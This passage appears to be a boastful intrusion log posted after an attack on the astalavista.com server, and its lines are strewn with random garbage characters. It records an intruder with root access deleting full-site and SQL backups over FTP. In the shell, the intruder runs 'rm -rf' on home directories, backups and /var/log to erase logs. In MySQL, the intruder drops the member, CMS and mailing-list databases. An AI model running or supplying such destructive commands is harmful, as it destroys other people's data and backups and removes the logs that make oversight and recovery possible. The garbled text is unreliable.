150 Opening BINARY mode data connection for ‘file list’.
7 }2 D7 Y. N- X" Pdr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com. [ u- q# ?2 z. a( O; t4 w3 Z( s
226 Transfer complete.
' j- `- [; J; f* xftp> cd astalavista.com
8 B6 f4 }5 z- k. R9 @250 CWD command successful.5 ?) q' D. b# P- n# k0 W
ftp> ls -la. h( N- u7 ^8 M& b5 a4 ?' ~& Z1 g
227 Entering Passive Mode (212,254,194,163,2,189)/ y& b0 {2 A% y/ C4 A
150 Opening BINARY mode data connection for ‘file list’.
$ S; I1 d& F T& F3 t$ w-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar8 i7 D8 L/ d: f6 }( S
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
8 b* u: K e. k& t; d& R-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2( W* H* M1 C$ W4 L5 t- N
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar% c; @4 R8 H# S
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
, [( L3 }5 b' s( |. [7 G: P) B[snip]
+ h5 {, T4 r, ?& e+ I226 Transfer complete.
7 p8 R. M# r! ?1 z f5 iftp> mdelete *0 W8 K+ t% G* B6 T& Q8 B) a4 G3 C
ftp> ls -la* x6 e4 j) k/ ~/ o1 W
227 Entering Passive Mode (212,254,194,163,2,193)$ |+ a4 g% o1 v$ k; w
150 Opening BINARY mode data connection for ‘file list’.) }( b# R- |- o- V& J
226 Transfer complete.5 z8 L n% J) Z* D- O/ i
ftp>6 f c$ A1 }& d* u
1 A; _! ]5 a% B5 tsh-3.2# cd /home: {* I6 a- E) Z- A9 ?6 u
sh-3.2# ls -la
. b/ w5 o% z$ |& ~4 R; _7 jtotal 120
# w: F [1 t( p' M5 B+ V# f0 Ldrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
3 h3 \' Z% @6 _+ Y" r. Hdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
0 {% Y) t( b. q* v. Mdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
# o3 W. F% V8 x- K7 z-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
( L, z7 q8 ]2 L# f0 m. g-rw——- 1 root root 8192 Jun 3 02:45 aquota.user' W& ]/ P! e w) U R
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet5 @/ `2 x* p% v7 F
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
P. a* O) w: X* Mdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161+ V5 M6 L% G# ?- e, s
drwx–x–x 10 com com 4096 Apr 28 12:40 com. ?6 k1 V5 m. z+ l6 x
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
( x7 u- P" R# B% U; Wdrwx—— 3 jon jon 4096 Sep 21 2007 jon
; Q; ]. s/ V3 J' ^- W# Jdrwx—— 2 root root 16384 Sep 11 2007 lost+found
: _# @1 j1 u9 O/ y/ Ydrwxr-xr-x 2 root root 4096 Sep 14 2007 my
v8 D8 o2 Z: u8 ?drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata/ g7 W# v7 v# y. C: O* z2 I: r
drwx—— 2 jon jon 4096 Sep 15 2007 test
7 G: N6 w; t" E. K+ S6 i; Hdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
) z- k+ g( {6 n, @5 Z% _# a3 m
" V# E; o* w: l9 g i( t8 Qsh-3.2# rm -rf backup/0 m) G5 L1 z' X; C4 D
sh-3.2# rm -rf backup.14161/7 m0 |* ]7 A; k! ^
sh-3.2# rm -rf ftp/
/ }2 n- h. }. [. z& lsh-3.2# rm -rf jon/
5 N1 |6 W6 W' \ Zsh-3.2# rm -rf my// A- q e- e$ ]" U4 k0 E
sh-3.2# rm -rf mysqldata/2 Q7 r1 {8 n8 g8 G1 ^- B3 D: P+ {% O
sh-3.2# rm -rf test/, [+ C% t, N% S/ R4 D! W0 ?; V$ k
sh-3.2# rm -rf tmp/7 E, h7 w$ d' \% ]9 v
sh-3.2# cd ~
$ A0 N6 H' v7 B( S5 wsh-3.2# rm -rf *1 j; v2 V: P* ]7 d
sh-3.2# rm -rf /var/log/ a7 p9 O3 Y$ W) A; g5 K
rm: cannot remove directory `/var/log//proftpd’: Directory not empty
r, Y _% y& l A6 S. N" }7 l# Ish-3.2# rm -rf /home/*, a j3 ?9 v. P- \
sh-3.2# mysql' X# I9 g4 h1 H2 O
Welcome to the MySQL monitor. Commands end with ; or \g.7 K3 F9 I' N4 R) C* B/ ]( f
Your MySQL connection id is 407156 [5 t; X% ~+ d
Server version: 5.0.45-community-log MySQL Community Edition (GPL)$ v$ N _+ X0 j/ n7 H* w6 S
1 ?. J$ n1 w4 q2 {2 uType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.8 \ f0 G# f0 |6 a# k$ ~
8 X+ t4 w7 A* D4 S, tmysql> show databases;
- \/ w; q7 Y3 Y4 \ E* c8 i+———————–+
5 w7 n% ]5 |3 s7 U' l8 h| Database |! N/ m& E: M# T
+———————–+9 A0 B; [9 g. b# U
| information_schema |
* E7 b4 V1 n- ~& |/ e| astanet_ads |9 E; Z. j: x* I) T
| astanet_mailing_lists |, a" n. T6 ^+ C' \8 A& v7 r
| astanet_mediawiki |
" C4 A7 n% E1 t) }: z6 w0 s- A- Z/ t| astanet_membersystem | v. x* [; G5 F' f# ~9 w. s! x
| com_contrexx | a- n/ q8 j" H5 x( P$ S
| com_contrexx2 |
' X: Y; V% j7 j+ ^| com_contrexx2_live |- K, m; f8 O5 S3 T4 Y) K
| da_roundcube |
& C0 ^3 I& V$ `4 n; V| dolphin |
' H5 J- k) h$ Q$ p| ideapool |$ |+ ?; T' ]0 S2 C( q
| mysql |
]+ h" y6 u" || test |. D$ C. [$ ~" d) q
| yourmaster |5 E+ m% P6 e# P- u, }+ n
+———————–+- Z: S& O2 u( w+ {1 [
14 rows in set (0.03 sec)/ m. @1 N2 w4 D4 j, ~6 P
& E5 K/ z* {+ Z. K8 O: pmysql> drop database astanet_membersystem;0 K; c! r0 ^1 G6 T
droQuery OK, 46 rows affected (0.81 sec)1 [2 C( {. G0 k, _! N
1 F8 G) F( ~9 Emysql> drop database com_contrexx;$ z4 {" X8 l; S: K
Query OK, 211 rows affected (2.72 sec) A g( D* ]2 Y1 R, K6 Z8 j
% n" M8 R: m$ U0 G; h7 Vmysql> drop database com_contrexx2; A2 j- E: ]9 [! E* @0 V/ t: \6 S+ }
Query OK, 237 rows affected (2.23 sec)
j" t2 ?3 h; J$ ~' T4 D
7 N/ R V" v4 T) T* h2 ~mysql> drop database com_contrexx2_live;, A- e/ | j H4 n: y
Query OK, 227 rows affected (7.63 sec)* w* q$ G* J! g# v# Y3 z0 }
: D9 s# w! ]2 u. \$ F
mysql> drop database ideapool;
) j' e- v0 E6 J' P# ]% hQuery OK, 69 rows affected (0.19 sec); U+ ?! V" D2 N1 p7 z
2 ?+ j% N5 F; ^4 d9 ?( u. k B( {mysql> drop database yourmaster;
: I5 @. J7 k" Z# J ^" IQuery OK, 158 rows affected (0.55 sec)5 o1 P% F2 W h+ ?
2 ?; V; B9 a: C% P2 _mysql> drop database astanet_ads;( D5 ~5 F7 N" g- a4 k2 r2 B
Query OK, 9 rows affected (0.11 sec)
0 E z& Y X. P0 S0 c4 H [, i' V% S$ B9 O: U. `$ V7 t; ~ @
mysql> drop database astanet_mailing_lists;
$ ^2 O% q' s# h6 v9 Y. \2 yQuery OK, 24 rows affected (1.47 sec)
: w6 V$ N2 r( J; ]3 r9 ?0 {. O7 @- e% ?- x; K9 h
mysql> drop database astanet_mediawiki;" Y6 A2 s! f) c8 u
Query OK, 31 rows affected (0.51 sec)
4 y2 }" `! I- e" K2 g) n: x G' g! I
7 X6 @2 f7 P0 `/ [1 f; c# }% o, fmysql> show databases;
/ n h; j* K- Q! h9 n4 [" r3 z+——————–+ ~; I9 C: A4 x3 ^( y1 C2 m% K
| Database |- { o4 U0 h5 V0 E, A- {9 D
+——————–+3 m) ^2 L ?6 H4 |
| information_schema |. s5 a: M1 G2 }/ t
| da_roundcube |
3 A' I) Z7 c, c| dolphin |
& d. r7 u+ y) ~' o8 j3 ^2 u| mysql |
6 K# ]/ e4 T$ y| test |% d- n1 U) X) m9 w+ C+ d
+——————–+' X- l$ Y' G$ E4 }) l4 ?# _
5 rows in set (0.00 sec)0 A' @& {! c. g0 F2 Y- N, l, o2 x
) [5 T' Z9 U u% w/ E) W0 o5 d/ _( k
What a journey! We’re not sure exactly why the “Terminator” had any influence on: z$ J$ g* S) v& ?
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the7 U- U: h* `4 R; n
wrong to say this pack of morons *wont be back*.- p8 r+ e0 h6 U# J% z- j$ J
|